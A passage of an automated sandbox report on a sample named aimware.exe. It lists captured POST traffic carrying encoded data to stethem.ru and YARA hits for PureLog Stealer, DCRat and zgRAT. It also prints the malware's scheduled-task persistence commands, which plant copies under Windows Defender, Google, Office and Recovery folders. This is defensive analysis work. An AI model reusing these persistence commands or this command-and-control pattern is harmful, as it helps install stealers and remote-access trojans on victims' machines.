Dec 28, 2024 22:20:11.104232073 CET	937	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 21:20:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SBpm55gVKKWitAv1kzuQ5RbsCcsEqMyTXAWjPvkjNkRHmGlaXrBLYITVcXPbyK8MsbYP8hzUxdDuWLqFtQfPuetUMkfZza90NFDSvkTIg0CPa3S%2FJbKAXpxfjjcb"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f9497c2de4cc47c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3820&min_rtt=1467&rtt_var=5256&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2111&delivery_rate=71945&cwnd=209&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 0c 13 22 50 22 26 2d 0f 21 33 35 11 24 39 26 1b 3c 09 02 01 3f 30 25 5a 24 17 2b 0f 3e 0d 0e 52 27 17 3a 1d 33 00 00 51 24 2f 2e 1c 32 39 28 51 06 12 21 08 35 01 2f 56 3a 04 3c 06 33 1e 03 1c 21 2e 3d 1e 24 00 21 53 31 16 39 12 35 07 3f 52 2f 3a 26 0b 2a 17 09 1a 28 21 2a 5f 23 11 2e 57 02 13 27 1a 3f 58 23 1d 20 22 3f 59 27 3b 27 58 36 59 25 50 30 3a 2a 1e 34 3d 02 06 29 3c 20 5d 20 51 27 10 29 17 09 5e 23 06 05 0c 28 29 22 55 2d 0e 2e 56 0f 35 56 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 98"P"&-!35$9&<?0%Z$+>R':3Q$/.29(Q!5/V:<3!.=$!S195?R/:&(!_#.W'?X# "?Y';'X6Y%P0:*4=)< ] Q')^#()"U-.V5VT0
Dec 28, 2024 22:20:11.506164074 CET	937	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 21:20:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SBpm55gVKKWitAv1kzuQ5RbsCcsEqMyTXAWjPvkjNkRHmGlaXrBLYITVcXPbyK8MsbYP8hzUxdDuWLqFtQfPuetUMkfZza90NFDSvkTIg0CPa3S%2FJbKAXpxfjjcb"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f9497c2de4cc47c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3820&min_rtt=1467&rtt_var=5256&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2111&delivery_rate=71945&cwnd=209&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 0c 13 22 50 22 26 2d 0f 21 33 35 11 24 39 26 1b 3c 09 02 01 3f 30 25 5a 24 17 2b 0f 3e 0d 0e 52 27 17 3a 1d 33 00 00 51 24 2f 2e 1c 32 39 28 51 06 12 21 08 35 01 2f 56 3a 04 3c 06 33 1e 03 1c 21 2e 3d 1e 24 00 21 53 31 16 39 12 35 07 3f 52 2f 3a 26 0b 2a 17 09 1a 28 21 2a 5f 23 11 2e 57 02 13 27 1a 3f 58 23 1d 20 22 3f 59 27 3b 27 58 36 59 25 50 30 3a 2a 1e 34 3d 02 06 29 3c 20 5d 20 51 27 10 29 17 09 5e 23 06 05 0c 28 29 22 55 2d 0e 2e 56 0f 35 56 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 98"P"&-!35$9&<?0%Z$+>R':3Q$/.29(Q!5/V:<3!.=$!S195?R/:&(!_#.W'?X# "?Y';'X6Y%P0:*4=)< ] Q')^#()"U-.V5VT0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.4	49948	172.67.132.55	80	3696	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 22:20:09.888799906 CET	323	OUT	POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: stethem.ru Content-Length: 1072 Expect: 100-continue Connection: Keep-Alive
Dec 28, 2024 22:20:10.274597883 CET	1072	OUT	Data Raw: 5a 59 5d 50 5b 47 54 57 5c 57 57 56 5a 5b 54 56 55 5b 59 50 55 51 57 53 5a 58 5e 50 54 52 56 54 5a 58 50 5e 5a 5f 54 5d 5a 5d 50 5f 58 5e 52 55 50 5e 5b 46 59 5a 59 53 50 5b 50 59 59 51 51 42 5a 58 43 5d 59 58 52 53 5b 59 5f 5a 5f 58 59 54 54 5f Data Ascii: ZY]P[GTW\WWVZ[TVU[YPUQWSZX^PTRVTZXP^Z_T]Z]P_X^RUP^[FYZYSP[PYYQQBZXC]YXRS[Y_Z_XYTT__VTXVBVUP^]YTXTYXVUZ]RYPD[\_\Y\][YZ[TT[XX[R^__[R\QQ\X[]]_QP\XQWQWWZ_U[XYX_[QZ_\P]\XSVPZVV]^]UVB]\R]]^X9)3/?-"%Z4&$3#8;:0\$-'52^$6*D'+=^,![",\-:
Dec 28, 2024 22:20:11.019191027 CET	25	IN	HTTP/1.1 100 Continue
Dec 28, 2024 22:20:11.505955935 CET	797	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 21:20:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6NJKIQ0xLdVKnOaBWQ%2BP3NsgHcDRP%2FKPg2hDI8PTIyhwwf1hX%2Bs2Ql0Zbbb06viLXkY0znBtMcoKsDJtS3uCzQaqU7ewlmhzPc6%2Fe9cMiKKcZlk%2FFPF16665WpJN"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f9497c3ed2c6a4f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=7907&min_rtt=1733&rtt_var=12998&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1395&delivery_rate=28556&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3e 5b 5b 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4>[[X0
Dec 28, 2024 22:20:11.660079002 CET	797	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 21:20:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6NJKIQ0xLdVKnOaBWQ%2BP3NsgHcDRP%2FKPg2hDI8PTIyhwwf1hX%2Bs2Ql0Zbbb06viLXkY0znBtMcoKsDJtS3uCzQaqU7ewlmhzPc6%2Fe9cMiKKcZlk%2FFPF16665WpJN"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f9497c3ed2c6a4f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=7907&min_rtt=1733&rtt_var=12998&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1395&delivery_rate=28556&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3e 5b 5b 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4>[[X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.4	49954	172.67.132.55	80	3696	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 22:20:11.836410046 CET	299	OUT	POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: stethem.ru Content-Length: 1072 Expect: 100-continue
Dec 28, 2024 22:20:12.188834906 CET	1072	OUT	Data Raw: 5a 5d 58 53 5e 48 54 52 5c 57 57 56 5a 5e 54 54 55 55 59 50 55 57 57 59 5a 58 5e 50 54 52 56 54 5a 58 50 5e 5a 5f 54 5d 5a 5d 50 5f 58 5e 52 55 50 5e 5b 46 59 5a 59 53 50 5b 50 59 59 51 51 42 5a 58 43 5d 59 58 52 53 5b 59 5f 5a 5f 58 59 54 54 5f Data Ascii: Z]XS^HTR\WWVZ^TTUUYPUWWYZX^PTRVTZXP^Z_T]Z]P_X^RUP^[FYZYSP[PYYQQBZXC]YXRS[Y_Z_XYTT__VTXVBVUP^]YTXTYXVUZ]RYPD[\_\Y\][YZ[TT[XX[R^__[R\QQ\X[]]_QP\XQWQWWZ_U[XYX_[QZ_\P]\XSVPZVV]^]UVB]\R]]^X9_,+>%<0'4:',,['?652&6E%8,,![",\-.
Dec 28, 2024 22:20:13.014018059 CET	25	IN	HTTP/1.1 100 Continue
Dec 28, 2024 22:20:13.266460896 CET	790	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 21:20:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oibKpI0tLzmGpksT%2FP1zwk0qAz4FRvcl3GhKQ8g%2Bi9pdBJQ0VSSMWqYbfFH0mrpaAR17FDQnxpM0jMAlxMuUFqSMPdT5V3oEgkeRvsI8kG9cMbnNf2NwvDzHAYBP"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f9497d05a587ce4-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4115&min_rtt=1984&rtt_var=5006&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1371&delivery_rate=76700&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3e 5b 5b 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4>[[X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.4	49960	172.67.132.55	80	3696	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 22:20:13.531372070 CET	299	OUT	POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: stethem.ru Content-Length: 1072 Expect: 100-continue
Dec 28, 2024 22:20:14.646677971 CET	25	IN	HTTP/1.1 100 Continue
Dec 28, 2024 22:20:20.792978048 CET	1072	OUT	Data Raw: 5f 58 58 53 5e 48 54 52 5c 57 57 56 5a 5e 54 5a 55 54 59 59 55 50 57 59 5a 58 5e 50 54 52 56 54 5a 58 50 5e 5a 5f 54 5d 5a 5d 50 5f 58 5e 52 55 50 5e 5b 46 59 5a 59 53 50 5b 50 59 59 51 51 42 5a 58 43 5d 59 58 52 53 5b 59 5f 5a 5f 58 59 54 54 5f Data Ascii: _XXS^HTR\WWVZ^TZUTYYUPWYZX^PTRVTZXP^Z_T]Z]P_X^RUP^[FYZYSP[PYYQQBZXC]YXRS[Y_Z_XYTT__VTXVBVUP^]YTXTYXVUZ]RYPD[\_\Y\][YZ[TT[XX[R^__[R\QQ\X[]]_QP\XQWQWWZ_U[XYX_[QZ_\P]\XSVPZVV]^]UVB]\R]]^X9_=0(Y?&1$#9#]/00="#2156D0+"/,![",\-.
Dec 28, 2024 22:20:21.351150990 CET	790	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 21:20:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3O2WONTNXq1BRC4IhE9ZZab63RT1n0VRJasuroB62ceSoIdxuAnHffpxPR27AwXuhoj6abkSZccmCSkF4Q8JW%2Bg8eZgS5MEYAKpd95i%2BySDzh62l3CuACJIDlszt"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f9497da9fecc445-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3438&min_rtt=1458&rtt_var=4508&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1371&delivery_rate=84378&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3e 5b 5b 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4>[[X0

Target ID:	0
Start time:	16:18:07
Start date:	28/12/2024
Path:	C:\Users\user\Desktop\aimware.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\aimware.exe"
Imagebase:	0xab0000
File size:	2'210'583 bytes
MD5 hash:	09B7A6FD3683F653EA233A547C082671
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1660085420.0000000007598000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1659465746.0000000006B5D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	16:18:08
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\webFontsession\ygBm0L4dnhMtPJ5zo9k2Iwhn4.vbe"
Imagebase:	0x5f0000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	16:18:14
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\webFontsession\7uhC6Mx3YQJtIYicktXEMaD7UeOIzINRTf.bat" "
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	16:18:14
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	16:18:14
Start date:	28/12/2024
Path:	C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe
Wow64 process (32bit):	false
Commandline:	"C:\webFontsession/SurrogatesessionRuntimeBrokerDhcp.exe"
Imagebase:	0x530000
File size:	1'922'560 bytes
MD5 hash:	73E7655A3D54309A3CCFB3B9CA197652
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000000.1726770611.0000000000532000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000004.00000002.1785396681.0000000012B6C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	16:18:17
Start date:	28/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "wDyQbcxdSUUjszASbw" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Defender\en-US\wDyQbcxdSUUjszASb.exe'" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	16:18:17
Start date:	28/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "wDyQbcxdSUUjszASb" /sc ONLOGON /tr "'C:\Program Files\Windows Defender\en-US\wDyQbcxdSUUjszASb.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	16:18:17
Start date:	28/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "wDyQbcxdSUUjszASbw" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Defender\en-US\wDyQbcxdSUUjszASb.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	16:18:17
Start date:	28/12/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dvzhjsuk\dvzhjsuk.cmdline"
Imagebase:	0x7ff768670000
File size:	2'759'232 bytes
MD5 hash:	F65B029562077B648A6A5F6A1AA76A66
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	16:18:17
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	16:18:17
Start date:	28/12/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7247.tmp" "c:\Windows\System32\CSCF3A8C87A1D90404F9DF2BA668ED638.TMP"
Imagebase:	0x7ff723a30000
File size:	52'744 bytes
MD5 hash:	C877CBB966EA5939AA2A17B6A5160950
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	16:18:18
Start date:	28/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "wDyQbcxdSUUjszASbw" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\google\wDyQbcxdSUUjszASb.exe'" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	16:18:18
Start date:	28/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "wDyQbcxdSUUjszASb" /sc ONLOGON /tr "'C:\Program Files (x86)\google\wDyQbcxdSUUjszASb.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	16:18:18
Start date:	28/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "wDyQbcxdSUUjszASbw" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\google\wDyQbcxdSUUjszASb.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	16:18:18
Start date:	28/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 14 /tr "'C:\Recovery\spoolsv.exe'" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	16:18:18
Start date:	28/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Recovery\spoolsv.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	16:18:18
Start date:	28/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 9 /tr "'C:\Recovery\spoolsv.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	16:18:18
Start date:	28/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "wDyQbcxdSUUjszASbw" /sc MINUTE /mo 10 /tr "'C:\Program Files\Microsoft Office 15\ClientX64\wDyQbcxdSUUjszASb.exe'" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	16:18:18
Start date:	28/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "wDyQbcxdSUUjszASb" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office 15\ClientX64\wDyQbcxdSUUjszASb.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	16:18:18
Start date:	28/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "wDyQbcxdSUUjszASbw" /sc MINUTE /mo 12 /tr "'C:\Program Files\Microsoft Office 15\ClientX64\wDyQbcxdSUUjszASb.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	16:18:18
Start date:	28/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "wDyQbcxdSUUjszASbw" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\windows photo viewer\wDyQbcxdSUUjszASb.exe'" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	16:18:18
Start date:	28/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "wDyQbcxdSUUjszASb" /sc ONLOGON /tr "'C:\Program Files (x86)\windows photo viewer\wDyQbcxdSUUjszASb.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	16:18:18
Start date:	28/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "wDyQbcxdSUUjszASbw" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\windows photo viewer\wDyQbcxdSUUjszASb.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	16:18:19
Start date:	28/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "SurrogatesessionRuntimeBrokerDhcpS" /sc MINUTE /mo 13 /tr "'C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe'" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	16:18:19
Start date:	28/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "SurrogatesessionRuntimeBrokerDhcp" /sc ONLOGON /tr "'C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	16:18:19
Start date:	28/12/2024
Path:	C:\Recovery\spoolsv.exe
Wow64 process (32bit):	false
Commandline:	C:\Recovery\spoolsv.exe
Imagebase:	0xdd0000
File size:	1'922'560 bytes
MD5 hash:	73E7655A3D54309A3CCFB3B9CA197652
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\spoolsv.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\spoolsv.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\spoolsv.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\spoolsv.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\spoolsv.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\spoolsv.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\spoolsv.exe, Author: Joe 